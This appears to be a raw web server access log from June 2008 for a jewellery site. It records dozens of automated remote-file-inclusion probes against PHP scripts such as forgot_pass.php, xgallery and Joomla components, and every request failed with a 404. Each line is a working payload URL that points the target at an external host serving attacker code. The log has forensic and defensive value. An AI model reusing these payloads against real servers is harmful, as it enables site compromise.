211.198.234.6 - - [30/Jun/2008:21:25:33 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.198.234.6 - - [30/Jun/2008:21:25:34 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.198.234.6 - - [30/Jun/2008:21:25:34 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.198.234.6 - - [30/Jun/2008:21:25:34 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
211.198.234.6 - - [30/Jun/2008:21:25:34 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
212.227.251.172 - - [30/Jun/2008:21:25:41 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:21:26:03 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:21:26:03 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:21:26:03 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
212.112.255.3 - - [30/Jun/2008:21:26:10 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
212.112.255.3 - - [30/Jun/2008:21:26:10 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
212.112.255.3 - - [30/Jun/2008:21:26:11 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
74.53.240.146 - - [30/Jun/2008:21:27:38 -0700] "GET //includes/dbal.php?eqdkp_root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.sojewels.com"
74.53.240.146 - - [30/Jun/2008:21:27:38 -0700] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.sojewels.com"
212.112.255.3 - - [30/Jun/2008:21:28:04 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
212.112.255.3 - - [30/Jun/2008:21:28:04 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
212.112.255.3 - - [30/Jun/2008:21:28:04 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
212.227.251.172 - - [30/Jun/2008:21:29:33 -0700] "GET /convert/mvcw.php?vwar_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
212.227.251.172 - - [30/Jun/2008:21:29:33 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
209.250.234.226 - - [30/Jun/2008:21:31:04 -0700] "GET /logs/access_080331.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.250.234.226 - - [30/Jun/2008:21:31:04 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.250.234.226 - - [30/Jun/2008:21:31:04 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
195.56.111.194 - - [30/Jun/2008:21:31:26 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
209.250.234.226 - - [30/Jun/2008:21:32:28 -0700] "GET /logs/access_080131.log/!scanhttp://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.250.234.226 - - [30/Jun/2008:21:32:28 -0700] "GET /!scanhttp://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
209.250.234.226 - - [30/Jun/2008:21:32:28 -0700] "GET /logs/!scanhttp://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
194.30.160.11 - - [30/Jun/2008:21:34:31 -0700] "GET /logs/access_080331.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
194.30.160.11 - - [30/Jun/2008:21:34:32 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
194.30.160.11 - - [30/Jun/2008:21:34:32 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
194.30.160.11 - - [30/Jun/2008:21:34:48 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
194.30.160.11 - - [30/Jun/2008:21:34:48 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
194.30.160.11 - - [30/Jun/2008:21:34:49 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
82.77.11.177 - - [30/Jun/2008:21:34:51 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.77.11.177 - - [30/Jun/2008:21:34:51 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.77.11.177 - - [30/Jun/2008:21:34:52 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
200.11.67.242 - - [30/Jun/2008:21:35:16 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [30/Jun/2008:21:35:16 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
200.11.67.242 - - [30/Jun/2008:21:35:17 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
212.227.251.172 - - [30/Jun/2008:21:36:44 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.208.40.137 - - [30/Jun/2008:21:36:54 -0700] "GET /logs/access_080331.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
89.208.40.137 - - [30/Jun/2008:21:36:54 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
89.208.40.137 - - [30/Jun/2008:21:36:54 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:37:02 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:37:05 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:37:05 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.29.4.54 - - [30/Jun/2008:21:37:08 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
123.100.226.24 - - [30/Jun/2008:21:37:11 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
123.100.226.24 - - [30/Jun/2008:21:37:12 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
123.100.226.24 - - [30/Jun/2008:21:37:13 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
200.29.4.54 - - [30/Jun/2008:21:37:14 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.203.245.7 - - [30/Jun/2008:21:37:18 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.203.245.7 - - [30/Jun/2008:21:37:18 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.203.245.7 - - [30/Jun/2008:21:37:19 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
200.29.4.54 - - [30/Jun/2008:21:37:20 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
91.200.212.3 - - [30/Jun/2008:21:38:11 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
195.56.111.194 - - [30/Jun/2008:21:38:26 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.56.111.194 - - [30/Jun/2008:21:38:26 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
202.221.143.111 - - [30/Jun/2008:21:38:29 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
209.250.234.226 - - [30/Jun/2008:21:38:50 -0700] "GET /logs/access_080531.log/!scanhttp://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
82.77.11.177 - - [30/Jun/2008:21:40:01 -0700] "GET /logs/access_080331.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.77.11.177 - - [30/Jun/2008:21:40:01 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
82.77.11.177 - - [30/Jun/2008:21:40:02 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://74.55.118.130/~consult/shop/egoods/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
69.36.4.233 - - [30/Jun/2008:21:40:07 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.36.4.233 - - [30/Jun/2008:21:40:07 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.36.4.233 - - [30/Jun/2008:21:40:07 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.89.21.71 - - [30/Jun/2008:21:40:10 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/baratra/aming.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.21.71 - - [30/Jun/2008:21:40:10 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/baratra/aming.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.89.21.71 - - [30/Jun/2008:21:40:10 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://h1.ripway.com/baratra/aming.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
69.36.4.233 - - [30/Jun/2008:21:40:23 -0700] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.36.4.233 - - [30/Jun/2008:21:40:25 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.36.4.233 - - [30/Jun/2008:21:40:25 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.36.4.233 - - [30/Jun/2008:21:40:25 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.36.4.233 - - [30/Jun/2008:21:40:50 -0700] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:21:42:31 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:21:42:32 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
201.218.50.7 - - [30/Jun/2008:21:42:32 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/classes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:42:36 -0700] "GET /logs/access.log/convert/mvcw.php?vwar_root=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:42:37 -0700] "GET /convert/mvcw.php?vwar_root=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:42:37 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:43:18 -0700] "GET /logs/access.log/convert/mvcw.php?step=1&vwar_root=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:43:18 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:43:18 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.btcashatclosing.com/listmessenger/public/files/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.188.110.30 - - [30/Jun/2008:21:43:21 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.188.110.30 - - [30/Jun/2008:21:43:21 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.188.110.30 - - [30/Jun/2008:21:43:21 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.56.111.194 - - [30/Jun/2008:21:43:41 -0700] "GET /convert/mvcw.php?vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
195.56.111.194 - - [30/Jun/2008:21:43:43 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
146.83.43.189 - - [30/Jun/2008:21:44:01 -0700] "GET /index2.php?content=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.188.110.30 - - [30/Jun/2008:21:44:05 -0700] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
91.200.212.3 - - [30/Jun/2008:21:45:19 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
91.200.212.3 - - [30/Jun/2008:21:45:19 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
202.221.143.111 - - [30/Jun/2008:21:45:53 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
202.221.143.111 - - [30/Jun/2008:21:45:53 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.sojewels.com"
67.18.241.90 - - [30/Jun/2008:21:48:45 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.shuling.com.tw/catalog/public/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
67.18.241.90 - - [30/Jun/2008:21:48:46 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.shuling.com.tw/catalog/public/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
67.18.241.90 - - [30/Jun/2008:21:48:46 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.shuling.com.tw/catalog/public/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:48:46 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:48:46 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:48:46 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:48:52 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:48:55 -0700] "GET /logs//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:48:56 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:48:56 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
72.233.63.178 - - [30/Jun/2008:21:48:57 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.globalcare.or.kr/donor/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
67.18.241.90 - - [30/Jun/2008:21:49:46 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
67.18.241.90 - - [30/Jun/2008:21:49:46 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
67.18.241.90 - - [30/Jun/2008:21:49:46 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://museo.infoitos.com//components/com_rwcards/y.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:49:49 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:49:58 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:21:50:10 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:21:50:10 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
82.194.70.164 - - [30/Jun/2008:21:50:10 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://74.55.118.130/~consult/shop/classes/safe.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:51:45 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:51:45 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jun/2008:21:51:46 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://antoniodirenzo.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:51:49 -0700] "GET /logs/access.log//forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
83.98.156.151 - - [30/Jun/2008:21:51:52 -0700] "GET //forgot_pass.php?AD_BODY_TEMP=http://www.listpage.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
